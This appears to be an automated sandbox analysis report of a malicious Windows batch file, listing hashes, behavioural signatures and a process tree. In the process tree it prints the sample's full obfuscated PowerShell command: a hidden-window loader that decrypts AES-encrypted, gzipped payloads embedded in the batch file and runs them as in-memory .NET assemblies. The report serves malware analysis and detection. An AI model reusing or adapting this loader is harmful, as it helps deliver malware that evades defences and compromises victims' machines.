Analysis

- max time kernel: 121s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 17-04-2024 01:08

Static task: static1
Behavioral task: behavioral1
Sample: 40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
Resource: win7-20240221-en
3 signatures, 150 seconds
General

- Target: 40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
- Size: 61KB
- MD5: 28de2826893ab7e1f2c97521e8fb8ef7
- SHA1: 50a03746f808599f6ea91b176bc1621c21911eeb
- SHA256: 40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1
- SHA512: 28f6268cb2944b2d9c76d35d0df6e23e02242bbf5d0a1556b585321a166bd3694cc2e78347d98df4ba1502d397654243ccce10b0935c92076fe12c67f688c451
- SSDEEP: 1536:NkwiNwg9/Sdqu+PZuFehHoCWryzg8jLVJTMdqEpo/LBfG:PiNw60+PZu+ICSXGxJTE8VfG
- Score: 1/10
Malware Config
Signatures

- Suspicious behavior: EnumeratesProcesses (1 IoC)

  pid    Process
  2556   powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)

  description               pid    Process
  Token: SeDebugPrivilege   2556   powershell.exe

- Suspicious use of WriteProcessMemory (9 IoCs)

  description                        pid    Process   procid_target
  PID 2120 wrote to memory of 2508   2120   cmd.exe   29
  PID 2120 wrote to memory of 2508   2120   cmd.exe   29
  PID 2120 wrote to memory of 2508   2120   cmd.exe   29
  PID 2508 wrote to memory of 2524   2508   cmd.exe   31
  PID 2508 wrote to memory of 2524   2508   cmd.exe   31
  PID 2508 wrote to memory of 2524   2508   cmd.exe   31
  PID 2508 wrote to memory of 2556   2508   cmd.exe   32
  PID 2508 wrote to memory of 2556   2508   cmd.exe   32
  PID 2508 wrote to memory of 2556   2508   cmd.exe   32
Processes

- [1] C:\Windows\system32\cmd.exe (PID 2120)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat"
  - Suspicious use of WriteProcessMemory

  - [2] C:\Windows\system32\cmd.exe (PID 2508)
    Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat
    - Suspicious use of WriteProcessMemory

    - [3] C:\Windows\system32\cmd.exe (PID 2524)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\40949bfd50832f026a1f9f6797c0bfa1f8b16698188fc42ca06b04340ba562c1.bat';$ZFXl='SpUNVvliUNVvtUNVv'.Replace('UNVv', ''),'GeIQUWtCIQUWurIQUWrIQUWenIQUWtPrIQUWoceIQUWssIQUW'.Replace('IQUW', ''),'MaaWJUinMaWJUoaWJUdaWJUuaWJUleaWJU'.Replace('aWJU', ''),'CLsXAreaLsXAteDLsXAeLsXAcLsXAryLsXAptLsXAoLsXArLsXA'.Replace('LsXA', ''),'CJHTlhanJHTlgeEJHTlxJHTltJHTlensJHTliJHTlonJHTl'.Replace('JHTl', ''),'EOAqclOAqcemeOAqcntOAqcAtOAqc'.Replace('OAqc', ''),'IYYGanvYYGaokYYGaeYYGa'.Replace('YYGa', ''),'DJEwBeJEwBcJEwBomJEwBprJEwBesJEwBsJEwB'.Replace('JEwB', ''),'LoFiVZaFiVZdFiVZ'.Replace('FiVZ', ''),'EnfjTctfjTcrfjTcyPfjTcofjTcinfjTctfjTc'.Replace('fjTc', ''),'TroNkUanoNkUsfoNkUooNkUrmFoNkUinoNkUalBoNkUlooNkUckoNkU'.Replace('oNkU', ''),'RPrvjePrvjaPrvjdLiPrvjnePrvjsPrvj'.Replace('Prvj', ''),'FPluNrPluNomBPluNasPluNe6PluN4PluNStPluNrPluNinPluNgPluN'.Replace('PluN', ''),'CfvCYopfvCYyfvCYTofvCY'.Replace('fvCY', '');powershell -w hidden;function DnPdg($NpRVN){$PsFdV=[System.Security.Cryptography.Aes]::Create();$PsFdV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$PsFdV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$PsFdV.Key=[System.Convert]::($ZFXl[12])('XN3NfgiFnJwaec6stVIzE/BuRsj55jkY+1Zsiukr1l4=');$PsFdV.IV=[System.Convert]::($ZFXl[12])('c4L4meGWtdx5xW7a8N8/JA==');$PQhBD=$PsFdV.($ZFXl[3])();$tJweH=$PQhBD.($ZFXl[10])($NpRVN,0,$NpRVN.Length);$PQhBD.Dispose();$PsFdV.Dispose();$tJweH;}function gsaQk($NpRVN){$XgXaM=New-Object System.IO.MemoryStream(,$NpRVN);$xWVjE=New-Object System.IO.MemoryStream;$klffI=New-Object System.IO.Compression.GZipStream($XgXaM,[IO.Compression.CompressionMode]::($ZFXl[7]));$klffI.($ZFXl[13])($xWVjE);$klffI.Dispose();$XgXaM.Dispose();$xWVjE.Dispose();$xWVjE.ToArray();}$FZeYR=[System.IO.File]::($ZFXl[11])([Console]::Title);$mGUkZ=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 5).Substring(2))));$froPR=gsaQk (DnPdg ([Convert]::($ZFXl[12])([System.Linq.Enumerable]::($ZFXl[5])($FZeYR, 6).Substring(2))));[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$froPR).($ZFXl[9]).($ZFXl[6])($null,$null);[System.Reflection.Assembly]::($ZFXl[8])([byte[]]$mGUkZ).($ZFXl[9]).($ZFXl[6])($null,$null); "

    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2556)
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken